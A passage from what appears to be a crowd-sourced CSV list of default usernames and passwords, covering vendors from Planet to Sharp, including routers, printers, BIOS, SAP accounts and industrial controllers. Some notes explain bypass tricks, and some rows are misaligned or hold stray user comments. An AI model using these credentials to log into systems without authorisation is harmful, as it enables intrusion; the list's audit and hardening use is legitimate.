Plugin,,,guest,guest,,,\nplaintree,Waveswitch,,,,default.password,,,\nplanet,ADE-4000,,Multi,admin,epicrouter,Admin,,\nplanet,ADE-4110,,HTTP,admin,epicrouter,Admin,,\nplanet,Adsl router,,,admin,epicrouter,,,\nplanet,Adsl router,,Multi,admin,epicrouter,,,\nplanet,Akcess Point,,HTTP,admin,admin,Admin,,\nplanet,FGSW-2402RS,,serial,admin,ISPMODE,Admin,,\nplanet,FNSW-2402S,,,admin,<> just hit ENTER ,,,\nplanet,FNSW-2402S,,Console,admin,<> just hit ENTER,,,\nplanet,FNSW-2402S,,Console,admin,lt;gt; just hit ENTER,,,\nplanet,GRT-501,,http,root,root,full,,\nplanet,WAP-1900/1950/2000,,2.5.0,,default,,,\nplanet,WAP-1900/1950/2000,,Admin,,default,,,\nplanet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin,,\nplanet,XRT-401D,,HTTP,admin,1234,Admin,,\npokertrackersoftware,PokerTracker 3,,,postgres,svcPASS83,,,\npollsafe,Pollsafe,,,SMDR,SECONDARY,,,\npollsafe,Pollsafe,,modem,SMDR,SECONDARY,,,\npolycom,HDX-7000,,,Polycom,456,portal,,\npolycom,HDX-7000,,,admin,456,portal,,\npolycom,SoundPoint IP 601,,,Polycom,456,Device Admin (Web),Admin credentials for Web interface,\npolycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User,,\npolycom,Soundstation IP 3000,,http,administrator,**#,Admin,,\npolycom,Soundstation\\SoundPoint IP,,,Polycom,456,,,\npolycom,ViewStation 4000,,v.35,,,,,\npolycom,ViewStation 4000,3.5,Multi,,admin,Admin,,\npolycom,ViewStation 4000,3.5,Multi,,x6zynd56,update software,,\npolycom,iPower 9000,,Multi,,,Admin,,\npostgresql,PostgreSQL,,,postgres,,,,\npostgresql,PostgreSQL,,CLI,postgres,,Administrator,,\npowerchute,UPS,,,pwrchute,pwrchute,,,\nprestige,650,,,admin,1234,Admin,,\nprestigio,Nobile,156,Multi,,,Admin,,\nprime,PrimeOS,,,dos,dos,,,\nprime,PrimeOS,,,fam,fam,,,\nprime,PrimeOS,,,guest,guest,,,\nprime,PrimeOS,,,guest1,guest,,,\nprime,PrimeOS,,,mail,mail,,,\nprime,PrimeOS,,,maint,maint,,,\nprime,PrimeOS,,,mfd,mfd,,,\nprime,PrimeOS,,,netlink,netlink,,,\nprime,PrimeOS,,,prime,prime,,,\nprime,PrimeOS,,,primenet,primeos,,,\nprime,PrimeOS,,,primeos,primeos,,,\nprime,PrimeOS,,,primos_cs,prime,,,\nprime,PrimeOS,,,system,prime,,,\nprime,PrimeOS,,,system,system,,,\nprime,PrimeOS,,,tele,tele,,,\nprime,PrimeOS,,,test,test,,,\nprime,PrimeOS,,Admin,system,prime,,,\nprime,PrimeOS,,Admin,system,system,,,\nprime,PrimeOS,,Multi,dos,dos,User,,\nprime,PrimeOS,,Multi,fam,fam,User,,\nprime,PrimeOS,,Multi,guest,guest,User,,\nprime,PrimeOS,,Multi,guest1,guest,User,,\nprime,PrimeOS,,Multi,guest1,guest1,User,,\nprime,PrimeOS,,Multi,mail,mail,User,,\nprime,PrimeOS,,Multi,maint,maint,User,,\nprime,PrimeOS,,Multi,mfd,mfd,User,,\nprime,PrimeOS,,Multi,netlink,netlink,User,,\nprime,PrimeOS,,Multi,prime,prime,User,,\nprime,PrimeOS,,Multi,prime,primeos,User,,\nprime,PrimeOS,,Multi,primenet,primenet,User,,\nprime,PrimeOS,,Multi,primenet,primeos,User,,\nprime,PrimeOS,,Multi,primeos,prime,User,,\nprime,PrimeOS,,Multi,primeos,primeos,User,,\nprime,PrimeOS,,Multi,primos_cs,prime,User,,\nprime,PrimeOS,,Multi,primos_cs,primos,User,,\nprime,PrimeOS,,Multi,system,prime,Admin,,\nprime,PrimeOS,,Multi,system,system,Admin,,\nprime,PrimeOS,,Multi,tele,tele,User,,\nprime,PrimeOS,,Multi,test,test,User,,\nprime,PrimeOS,,User,guest,guest,,,\nprime,PrimeOS,,User,guest1,guest,,,\nprime,PrimeOS,,User,guest1,guest1,,,\nprime,PrimeOS,,User,mail,mail,,,\nprime,PrimeOS,,User,mfd,mfd,,,\nprime,PrimeOS,,User,netlink,netlink,,,\nprime,PrimeOS,,User,prime,prime,,,\nprime,PrimeOS,,User,primenet,primenet,,,\nprime,PrimeOS,,User,primenet,primeos,,,\nprime,PrimeOS,,User,primos_cs,prime,,,\nprime,PrimeOS,,User,primos_cs,primos,,,\nprime,PrimeOS,,User,tele,tele,,,\nprime,PrimeOS,,User,test,test,,,\nprimebase,SQL Database Server,,4.2,Administrator,,,,\nprimebase,SQL Server,4.2,,Administrator,,,,\nprocurve,V1810-24g,,192,168,2,10,,\nprolite,Tru-Color II,version 5,Remote Control,,,,,\nprolite,Tru-Color II,version 5,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down during both steps.,\nprolite,Tru-Color II,version 6,Remote Control,,,,,\nprolite,Tru-Color II,version 6,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down during both steps.,\nprolite,Tru-Color XP,version 8,Remote Control,,,,,\nprolite,Tru-Color XP,version 8,Remote Control,,,,No default password but if protected the password is always 4 characters and can be reset by unplugging the sign power and plugging it back in with remote ESC key held down during both steps.,\npromise,FastTrak TX4310,,HTTP,admin,admin,admin,,\npromise,FastTrak TX4310,,admin,admin,admin,,,\npromisetechnologyinc,WebPAM,,,administrator,password,,,\nprostar,1224,,,,4321,,,\nprostar,1224,,Other,,4321,,,\nprotocraft,authentic train whistle,,,musi1921,Musi%1921,,,\nproxicast,LAN-Cell Gateway GPRS-401,,,,1234,,,\nproxim,AP-2000,,,,public,,,\nproxim,AP-2000,,,,public,Admin,,\nproxim,AP-2000,,,,public,Admin,Default SSID = tsunami,\nproxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se ,no se,se me perdio el pass quiero recuperarlo,\nproxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se,no se,se me perdio el pass quiero recuperarlo,\nproxim,ORiNOCO AP-600,,http://169.254.128.132,,public,Administration,,\nproxim,ORiNOCO AP-600,all version,192.168.0.2,,,admin,,\nproxim,ORiNOCO AP-700,,http://169.254.128.132,,public,Administration,,\nproxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint,\nproxim,Orinoco AP-4000,802.11a/b/g,http://192.168.1.4/,,,admin,,\nproxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215) ,TELNET/HTTP,,public,admin,,\nproxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215),TELNET/HTTP,,public,admin,,\nprtg,PRTG Network Monitor,,,prtgadmin,prtgadmin,,,\npsionteklogix,9150,,HTTP,support,h179350,Admin,,\npyramid computer,BenHur,,Admin,admin,admin,,,\npyramid computer,BenHur,,Admin,admin,gnumpf,,,\npyramid computer,BenHur,,all,admin,admin,,,\npyramidcomputer,BenHur,all,HTTP,admin,admin,Admin,,\npyramidcomputer,BenHur,all,HTTP,admin,gnumpf,Admin,,\nqdi,Broadband Gateway 100,,,,password,,,\nqdi,Broadband Gateway 100,,Admin,,password,,,\nqdi,Broadband Gateway 100,,Telnet/HTTP,,password,Admin,,\nqdi,PC BIOS,,,,QDI,,,\nqdi,PC BIOS,,Admin,,QDI,,,\nqdi,PC BIOS,,Console,,QDI,Admin,,\nqdi,SpeedEasy BIOS,,,,lesarotl,,,\nqdi,SpeedEasy BIOS,,Admin,,lesarotl,,,\nqdi,SpeedEasy BIOS,,Console,,lesarotl,Admin,,\nqtec,790RH,,,Admin,,,,\nqtec,790RH,,http://192.168.1.1,Admin,,Administration,,\nquake,Quake Server,,,,tms,,rcon password; appears to require that you masquerade as 192.246.40.* to use,\nqualiteam,X-Cart,,,master,master,,,\nquantex,PC BIOS,,,,xljlbj,,,\nquantex,PC BIOS,,Admin,,teX1,,,\nquantex,PC BIOS,,Admin,,xljlbj,,,\nquantex,PC BIOS,,Console,,teX1,Admin,,\nquantex,PC BIOS,,Console,,xljlbj,Admin,,\nquantum,File Servers,,Most of them,,,,,\nquantum,File Servers,,User,,,,,\nquantum,File Servers,Most of them,HTTP,,,User,,\nquestra,IDM Application Suite,,,guest,guest,,,\nquestra,IDM Application Suite,,,questra,questra,,,\nquickeagle,DL700 ADSL2+,,192.168.1.254,admin,admin,Admin,,\nquickeagle,DL710 ADSL2+,,192.168.1.254,admin,admin,Admin,,\nquintumtechnologiesinc,Tenor Series,all,Multi,admin,admin,Admin,,\nradio shack,TAD-1004,,keypad,,744,,,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,RS,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,RSlt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,In-Store Demo PC Windows Screen Savers,,,,lt;Store Numbergt;,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book.,\nradioshack,TAD-1004,,Multi,,744,keypad,,\nradware,Linkproof,,ssh,lp,lp,Admin,,\nradware,Linkproof,3.73.03,Multi,radware,radware,Admin,,\nradware,Scopia,,,Administrator,1234,,,\nradware,Scopia,,,User,1234,,,\nraidzone,raid arrays,,,,raidzone,,,\nrainbow,IKEY 1000,,,,rainbow,Admin,,\nrainbow,IKEY 1000,,,,rainbow,Admin,password=pin,\nrainbow,IKEY 2000,,,,PASSWORD,,,\nrainbow,IKEY,,1000,,rainbow,,,\nrainbow,IKEY,,2000,,PASSWORD,,,\nrainerwichmann,Beltane,,,rainer,wichmann,,,\nramp networks,WebRamp,,,wradmin,trancell,,,\nrampnetworks,WebRamp,,,wradmin,trancell,,,\nrapidstream,RS4000-RS8000,,,rsadmin,rsadmin,,Linux,\nrapidstream,RapidStream Appliances,,,rsadmin,,,,\nraritan,KVM Switches,,,admin,raritan,,,\nraritan,KVM Switches,,,admin,raritan,Admin,,\nraritan,Power IQ,,,admin,raritan,,,\nraritan,Power IQ,,,epiq_api,raritan,,,\nraritan,Power IQ,,,web_api,sl33p30F00dumass!,,,\nraytalk,RB-300,,,root,root,,,\nraytalk,RB-300,,,root,root,Admin,,\nrca,DCW615R,,,,admin,,,\nrca,DCW615R,,http://192.168.100.1 or http://192.168.0.1,,admin,Administration,,\nredhat,Redhat 6.2,,,piranha,piranha,,,\nredhat,Redhat 6.2,,,piranha,q,,,\nredhat,Redhat 6.2,,HTTP,piranha,piranha,User,,\nredhat,Redhat 6.2,,HTTP,piranha,q,User,,\nredhat,Redhat 6.2,,User,piranha,piranha,,,\nredhat,Redhat 6.2,,User,piranha,q,,,\nredline,,,,user,user,192.168.25.2,,\nredline,an50,,,admin,admin,,,\nredline,an50,02.02,Multi,admin,admin,,,\nredline,an50,2.02,Multi,admin,admin,,,\nremedy,Remedy,,,ARAdmin,AR#Admin#,,,\nremedy,Remedy,,Multi,Demo,,,,\nremedy,Remedy,,multi,ARAdmin,AR#Admin#,Admin,,\nremedy,Remedy,,multi,Demo,,,,\nresearch machines,Classroom Assistant,,,manager,changeme,,,\nresearch,PC BIOS,,,,Col2ogro2,,,\nresearch,PC BIOS,,Admin,,Col2ogro2,,,\nresearch,PC BIOS,,Console,,Col2ogro2,Admin,,\nresearchmachines,Classroom Assistant,,,manager,changeme,,Windows 95,\nresumix,Resumix,,,root,resumix,,,\nricoh,1013F,,,,sysadm,,,\nricoh,1022,1.75,,admin,admin,,,\nricoh,1224c,,http,,password,,,\nricoh,1232c,-,http,admin,password,admin,,\nricoh,1301f,,,,sysadm,,,\nricoh,2035e,,web,admin,password,,no entry ta administrator,\nricoh,2060,,,admin,admin,,,\nricoh,2060,,HTTP,admin,,Admin,,\nricoh,2500,,,admin,blank,admin,,\nricoh,3235c,,192.168.0.76,admin,,ad,lype,\nricoh,3245C,,,admin,blank,admin,,\nricoh,4430NF,,10.226.5.1,admin,,Admin,,\nricoh,650,,,,sysadm,http,,\nricoh,AP410N,1.13,HTTP,admin,,Admin,,\nricoh,AP610N,,telnet,admin,,admin,,\nricoh,Aficio 1013 1515 2013 120,,,sysadm,sysadm,,,\nricoh,Aficio 1022,,,Admin,password,,,\nricoh,Aficio 1027,,http://,admin,password,admin,,\nricoh,Aficio 1045,,HTTP,admin,password,,,\nricoh,Aficio 2015,,http,admin,password,,,\nricoh,Aficio 2018D,,http,admin,password,Admin,,\nricoh,Aficio 2020D,,HTTP,admin,password,Admin,,\nricoh,Aficio 2022,1.04,http,admin,password,admin,,\nricoh,Aficio 2035,,,sisadm,password,,,\nricoh,Aficio 2045e,,http,admin,password,Admin,,\nricoh,Aficio 2075,,,admin,,Admin,,\nricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin,\nricoh,Aficio 2232C,,Telnet,,password,Admin,,\nricoh,Aficio 3025,,,admin,,Admin,,\nricoh,Aficio 3035,,,admin,,Admin,,\nricoh,Aficio 3228,,,admin,,Admin,,\nricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin,\nricoh,Aficio MP 161,,telnet http,admin,,,,\nricoh,Aficio MP 161,windows xp,USB,,,,,\nricoh,Aficio MP 171,,http or telnet,admin,,,,\nricoh,Aficio MP 2000,,,admin,,root acces,,\nricoh,Aficio MP 2500,1.03,HTTP,admin,,Administrator,,\nricoh,Aficio MP 2510,all versions,http://192.168.0.92,,000000,,,\nricoh,Aficio MP 2550,,web interface,admin,,admin,,\nricoh,Aficio MP 2851,,,admin,,,,\nricoh,Aficio MP 3350,,,admin,,administrator,,\nricoh,Aficio MP 4500,,,admin,,,,\nricoh,Aficio MP 5500,2.08,Telnet / HTTP,admin,,Admin,,\nricoh,Aficio MP 8001,all,http,admin,,,,\nricoh,Aficio MP C2050,,,admin,,Administrator,,\nricoh,Aficio MP C2051,,http,admin,,,,\nricoh,Aficio MP C2800,,,admin,,,,\nricoh,Aficio MP C4000,,,admin,,,,\nricoh,Aficio MP C4500,,HTTP,admin,,admin,,\nricoh,Aficio MP printers,,,admin,no password,,,\nricoh,Aficio MPC305,1.11.1,Web Server,admin,,Administrator,,\nricoh,Aficio MPC5501,,,admin,,Admin,,\nricoh,Aficio SP 3500SF,,,,admin,,,\nricoh,Aficio SP 4210N,,Web Interface,admin,,,,\nricoh,Aficio SP C220N,,,aucun,aucun,,,\nricoh,Aficio SP C220N,,http,Admin,,,case sensitive must have upper case A,\nricoh,Aficio SP C220N,,http://192.168.0.135,,,,,\nricoh,Aficio SP C231N,,web,Admin,,Administrator,Logon name CASE SENSITIVE,\nricoh,Aficio SP4100N,,,admin,,Administator account,,\nricoh,Aficio,1515,http,administrator,password,administrator access,,\nricoh,Aficio,2027,,admin,password,,,\nricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin,,\nricoh,Aficio,CL100N,Web,admin,password,,,\nricoh,Aficioh,,Administrator,admin,,,,\nricoh,Africo MP 161,,Telnet/HTTP,admin,,Administrator,,\nricoh,All MP and MPC,,Console,Supervisor,,,To change admin password,\nricoh,C231N,,,Admin,password,,A must be capitalized in username,\nricoh,CL2000N,,,admin,password,,,\nricoh,CL3500N,,GUI,admin,leave blank,,,\nricoh,DSC338 Printer,1.19,HTTP,,password,Admin,no user,\nricoh,MFP 2550,,web interface,admin,,admin,,\nricoh,MP 161SPF,,Http://,admin,,,,\nricoh,MP 171,1,http://192.168.126.70/,admin,,admin,,\nricoh,MP 2001SP/MP 2501SP,1.00,\\\\192.168.0.227,,,,,\nricoh,MP 2550 printer,,,admin,no password,,,\nricoh,MP 7500,2.02.1,HTTP,admin,,Admin,Webpage admin,\nricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica se colocar ela criptografa,\nricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica,\nricoh,MP C2003,,Web,admin,,Admin,,\nricoh,MP C3300,,http://copier-ip,admin,,Admin,,\nricoh,MP C4000,,http,admin,,Admin Access,,\nricoh,MP C5000,,,admin,password,web,admin,\nricoh,MP C6000,,HTTP,admin,N/A,Web admin,,\nricoh,MP4000,,web,admin,,,,\nricoh,NRG MP-301,,http://157.88.149.100,admin,odim,,,\nricoh,SP 4100N,,web interface,admin,,,leave password black,\nricoh,SP 4100N,All,Web,supervisor,,Allow change of admin password,,\nricoh,SP C232DN,,,Admin,password,,note A is capitalized,\nricoh,SP C311N,,HTTP,Admin,,Config.-Admin,Username is case-sensitive,\nricoh,SP C311N,,http,Admin,,,,\nricoh,SP C311N,,http,Admin,password,,,\nricoh,SPC232,all versions,http,Admin,,admin,,\nricoh,afcio mp 161,,telnet http,admin,,,,\nricoh,aficio 3045,1.38,console,admin,,admin,,\nricoh,aficio 3224c,all models,,http://192.168.1.104,admin,420008,admin,reset password\nricoh,aficio 650 windows xp,all versions,http//192.168.1.4,,,admin,,\nricoh,aficio,1027,192.168.1.44,admin,admin,,,\nriverbed,Acelerador,,http,Admin,password,,,\nrizen,WebGUI,,,Admin,123qwe,,,\nrizen,WebGUI,,,Admin,123qwe,Admin,,\nrm,RM Connect,,,RMUser1,password,,,\nrm,RM Connect,,,admin,rmnetlm,,,\nrm,RM Connect,,,admin2,changeme,,,\nrm,RM Connect,,,adminstrator,changeme,,,\nrm,RM Connect,,,deskalt,password,,,\nrm,RM Connect,,,deskman,changeme,,,\nrm,RM Connect,,,desknorm,password,,,\nrm,RM Connect,,,deskres,password,,,\nrm,RM Connect,,,guest,,,,\nrm,RM Connect,,,replicator,replicator,,,\nrm,RM Connect,,,setup,changeme,,,\nrm,RM Connect,,,teacher,password,,,\nrm,RM Connect,,,temp1,password,,,\nrm,RM Connect,,,topicalt,password,,,\nrm,RM Connect,,,topicnorm,password,,,\nrm,RM Connect,,,topicres,password,,,\nrm,RM Connect,,Main Login,PROPAGATE,APPLICATION,Full,used in school,\nrm,RM Connect,,Multi,RMUser1,password,,,\nrm,RM Connect,,Multi,admin,rmnetlm,,,\nrm,RM Connect,,Multi,admin2,changeme,,,\nrm,RM Connect,,Multi,adminstrator,changeme,,,\nrm,RM Connect,,Multi,deskalt,password,,,\nrm,RM Connect,,Multi,deskman,changeme,,,\nrm,RM Connect,,Multi,desknorm,password,,,\nrm,RM Connect,,Multi,deskres,password,,,\nrm,RM Connect,,Multi,guest,,,,\nrm,RM Connect,,Multi,replicator,replicator,,,\nrm,RM Connect,,Multi,setup,changeme,,,\nrm,RM Connect,,Multi,teacher,password,,,\nrm,RM Connect,,Multi,temp1,password,,,\nrm,RM Connect,,Multi,topicalt,password,,,\nrm,RM Connect,,Multi,topicnorm,password,,,\nrm,RM Connect,,Multi,topicres,password,,,\nrm,RM Connect,,Propagating!,PROPAGATE,APPLICATION,Full,used in school,\nrm,Server BIOS,,,,RM,,,\nrm,Server BIOS,,Console,,RM,,,\nrm,computer,,Other,administrator,password/changeme or secret,l:/ and take of restrictions,,\nrnn,RNN's Guestbook,1.2,http,admin,demo,Admin,,\nrnn,RNN's Guestbook,1.2,http,admin,demo,Admin,stored in plaintext in gbpass.pl,\nroamabout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin,,\nrodopi,Rodopi billing software 'AbacBill' sql database,,,rodopi,rodopi,,,\nrodopi,Unknown,,,Rodopi,Rodopi,,,\nrsa,Access Manager,,,admin,admin1234,,,\nrsa,Cleartrust,,,admin,admin1234,,,\nsafecom,Router,,,admin,epicrouter,,,\nsafecom,Router,,Admin,admin,epicrouter,,,\nsafecom,Router,,Multi,admin,epicrouter,Admin,,\nsagem,F@ST ,2404,Telnet , SSH , HTTP,admin,administrator,\nsagem,Fast 1200 (F@ST 1200),,Telnet,root,1234,User,root/1234,\nsagem,Fast 1200 (Fast 1200),,Telnet,root,1234,User,root/1234,\nsagem,Fast 1201 (F@ST 1201),,192.168.1.1,admin,admin,Admin,,\nsagem,Fast 1201 (F@ST 1201),Optus version,10.1.1.1,,,Admin,,\nsagem,Fast 1400 (F@ST 1400),,Multi,admin,epicrouter,Admin,,\nsagem,Fast 1400,,Multi,admin,epicrouter,Admin,,\nsagem,Fast 1400w (F@ST 1400w),,Multi,root,1234,Admin,,\nsagem,Fast 1400w,,Multi,root,1234,Admin,,\nsagem,Fast 2404 (F@ST 2404),,Telnet,admin,admin,admin,The default password for sagem f@st 2404 routers (also a lot of other sagem fast versions 1200/1240/1400/1400W/1500/1500-WG ),\nsagem,Fast 2604 (F@ST 2604),253124416,multi,user,user,user,,\nsambar technologies,Sambar Server,,,admin,,,,\nsambar technologies,Sambar Server,,,anonymous,,,,\nsambar technologies,Sambar Server,,,billy-bob,,,,\nsambar technologies,Sambar Server,,,ftp,,,,\nsambar technologies,Sambar Server,,,guest,guest,,,\nsambartechnologies,Sambar Server,,http,admin,,Admin,,\nsambartechnologies,Sambar Server,,http,anonymous,,,,\nsambartechnologies,Sambar Server,,http,billy-bob,,,,\nsambartechnologies,Sambar Server,,http,ftp,,Admin,,\nsambartechnologies,Sambar Server,,http,guest,guest,Admin,,\nsamsung,AHT-E300,Multi,admin,password,Admin,,,\nsamsung,AHT-E300,Multi,admin,password,Admin,,after reset,\nsamsung,CLP-325W,,,admin,sec00000,Admin,,\nsamsung,CLX-3300,,HTTP,admin,sec00000,,,\nsamsung,CLX-4195FW,,,admin,sec00000,,,\nsamsung,E700,,Password,Moeketsik,874434,,,\nsamsung,G2512,PASSWORD,,SAMSUNG,123456,123456,DEFICULT,\nsamsung,N620,,Multi,,,Admin,,\nsamsung,Printers,,,,s!a@m#n$p%c,,,\nsamsung,SCX-4726,,HTTP,admin,sec00000,Admin,,\nsamsung,SGH E700,,,,874434,User,Sms,\nsamsung,SGH E700,,,Samsung,,,Sms,\nsamsung,SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203,\nsamuel abels,Ammerum,,0.6-1,user,password,,,\nsamuelabels,Ammerum,0.6-1,,user,password,,,\nsap,Axis2,,,admin,axis2,,,\nsap,Business Connector,,4.7,Administrator,manage,,,\nsap,Business Connector,,4.7,Developer,isdev,,,\nsap,Business Connector,,4.7,Replicator,iscopy,,,\nsap,Business Connector,4.7,,Administrator,manage,Admin,,\nsap,Business Connector,4.7,,Developer,isdev,Admin,,\nsap,Business Connector,4.7,,Replicator,iscopy,Admin,,\nsap,ITS,,,itsadmin,init,,,\nsap,SAP Local Database,,,SAPR3,SAP,,,\nsap,SAP,,,DDIC,19920706,,,\nsap,SAP,,,EARLYWATCH,SUPPORT,,,\nsap,SAP,,,SAP*,7061992,,,\nsap,SAP,,,SAPCPIC,ADMIN,,,\nsap,SAP,,000 001 066,SAP*,06071992,,,\nsap,SAP,,000 001,DDIC,19920706,,,\nsap,SAP,,000,SAPCPIC,ADMIN,,,\nsap,SAP,,066,EARLYWATCH,SUPPORT,,,\nsap,SAP,,Admin,SAPCPIC,ADMIN,,,\nsap,SAP,,Mandant 066,SAP,SAP internal,,,\nsap,SAP,,R/3,DDIC,19920706,,,\nsap,SAP,,R/3,EARLYWATCH,SUPPORT,,,\nsap,SAP,,R/3,SAP*,06071992,,,\nsap,SAP,,R/3,SAPCPIC,ADMIN,,,\nsap,SAP,,R/3,TMSADM,,,,\nsap,SAP,,SAP internal,DDIC,19920706,,,\nsap,SAP,,SAP internal,EARLYWATCH,SUPPORT,,,\nsap,SAP,,SAP internal,SAP*,07061992,,,\nsap,SAP,,SAP internal,SAP*,PASS,,,\nsap,SAP,R/3,,SAP*,06071992,,,\nsap,SAP,R/3,,SAP*,6071992,,,\nsap,SAP,R/3,,TMSADM,,,,\nsap,SAP,R/3,SAP client,DDIC,19920706,SAP internal; Mandant 001,,\nsap,SAP,R/3,SAP client,EARLYWATCH,SUPPORT,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,07061992,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,7061992,SAP internal; Mandant 066,,\nsap,SAP,R/3,SAP client,SAP*,PASS,SAP internal; all Mandants,,\nsap,SAP,R/3,SAP client,SAPCPIC,ADMIN,Admin,,\nsavin,C2525,,HTTP,admin,blank,Admin,,\nschneider electric,PowerLogic Ethernet Communications Card,,,,admin,,,\nschneiderelectric,ETZ 410\\510 Module,,,USER,USER,,,\nschneiderelectric,FactoryCast Quantum\\Premium PLC Management,,,USER,USER,,,\nschneiderelectric,FactoryCast Quantum\\Premium PLC Management,,,ntpupdate,ntpupdate,,,\nschneiderelectric,PowerLogic ethernet card,,http,,admin,Admin,,\nschneiderelectric,Quantum NOE 771 xx Ethernet Module,,,USER,USER,,,\nscientificatlanta,,,http://192.168.100.1,CARMEN,,ROOT,,\nscientificatlanta,001BD7FF92D4,comcast-supplied,192.168.100.1,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,2100,comcast-supplied,http,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,2320,,http://192.168.0.1./,admin,W2402,,,\nscientificatlanta,2320,,http://192.168.100.1,,,,,\nscientificatlanta,93209215,CABLE MODEM / EMTA,http://192.168.0.1,,admin,Admin,,\nscientificatlanta,93209215,CABLE MODEM / EMTA,http://192.168.0.1,admin,password,Admin,,\nscientificatlanta,93209215,Webstar DPC2434,192.168.0.1,admin,w2402,admin,,\nscientificatlanta,D/EPC2100,,,admin,W2402,,search in google for more info,\nscientificatlanta,DPC2203 windows 7,1,192.168.100.1,,,admin,,\nscientificatlanta,DPC2203,1.1,http://192.168.0.1,admin,W2403,Admin,,\nscientificatlanta,DPR2325R3,3,192.168.0.1,admin,W2402,Admin,,\nscientificatlanta,DPR2325R3,3.0,,,,admin,,\nscientificatlanta,DPR2325R3,3.0,192.168.0.1,admin,W2402,Admin,,\nscientificatlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1,\nscientificatlanta,EPC-2203,1,http://192.168.100.1/_aslvl.asp,admin,W2402,Change level 2,,\nscientificatlanta,EPC2100,all versions,http://192.168.0.1,,,admin,,\nscientificatlanta,EPC2100R2,HW Rev 2.1,modem,,,admin,,\nscientificatlanta,EPC2505,1,http://192.168.100.1,admin,W2402,status,,\nscientificatlanta,EPC2505,1.0,http://192.168.100.1,admin,W2402,status,,\nscientificatlanta,EPR2320R2,2,192.168.0.1,,Admin,,,\nscientificatlanta,EPR2320R2,2.0,192.168.0.1,,Admin,,,\nscientificatlanta,EPR2320R2,2.0,http://192.168.100.1,WebSTAR,,Access by everyone,Default password,\nscientificatlanta,EPR2320R2,v2.0.2r1262-070212,192.168.0.1,admin,admin,admin,nao consigo entra no router,\nscientificatlanta,EPR2325R3,3,http://192.168.100.1,admin,admin,admin,,\nscientificatlanta,EPR2325R3,3.0,http://192.168.100.1,admin,admin,admin,,\nscientificatlanta,SERVICE ELECTRIC CABLE (SECABLE),SERVICE ELECTRIC CABLE (SECABLE),http://192.168.100.1/,admin,W2402,Status,Status Page,\nscientificatlanta,WebSTAR EPC2100R2, 2.0,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,,\nscientificatlanta,WebSTAR EPC2100R2,2,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,,\nscientificatlanta,epr2325r3,all,http://192.168.100.1/,,,Admin,,\nseagullscientific,Track'Em,,,ADMIN,admin,Admin,,\nseagullscientific,Track'Em,,,USER,USER,Admin,,\nseclore,FileSecure,,,root,changeonfirstlogin,,,\nseclore,FileSecure,,,sa,changeonfirstlogin,,,\nsecuricor3net,Cezanne,,,manager,friend,,,\nsecuricor3net,Cezzanne,,,manager,friend,,any,\nsecuricor3net,Monet,,,manager,friend,,any,\nsecurity.org,lockpicking,,,admin,,,,\nsecurstar,ikey,,admin,admin,rainbow,,,\nsecurstar,ikey,1000,Multi,admin,rainbow,admin,,\nsemaphore,PICK O/S,,,DESQUETOP,,,,\nsemaphore,PICK O/S,,,DS,,,,\nsemaphore,PICK O/S,,,DSA,,,,\nsemaphore,PICK O/S,,,PHANTOM,,,,\nsenao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1,\nserver technology,Sentry Remote Power Manager,,,ADMN,admn,,,\nserver technology,Sentry Remote Power Manager,,,GEN1,gen1,,,\nserver technology,Sentry Remote Power Manager,,,GEN2,gen2,,,\nserver technology,Sentry Remote Power Manager,,Admin,ADMN,admn,,,\nserver technology,Sentry Remote Power Manager,,view/control,GEN1,gen1,,,\nserver technology,Sentry Remote Power Manager,,view/control,GEN2,gen2,,,\nservertechnology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001,\nservertechnology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001,\nservertechnology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001,\nseyeon,FlexWATCH,,,root,root,,,\nsgi,Embedded Support Partner,,,Administrator,Partner,,IRIX 6.5.6,\nsgi,IRIX,,,EZsetup,,,ALL,\nsgi,IRIX,,,lp,lp,,ALL,\nsgi,all,,,root,,,all,\nsharp,AR-201,,http,,sysadm,,,\nsharp,AR-280,,Full,,sysadm,,,\nsharp,AR-280,,HTTP,,sysadm,Full,,\nsharp,AR-336,,HTTP,,sysadm,admin,,\nsharp,AR-336,,admin,,sysadm,,,\nsharp,AR-407/S402 ,,Multi,,,Admin,,\nsharp,AR-407/S402,,Multi,,,Admin,,\nsharp,AR-M205,,Web,admin,Sharp,full,,\nsharp,AR-M257,,WEB 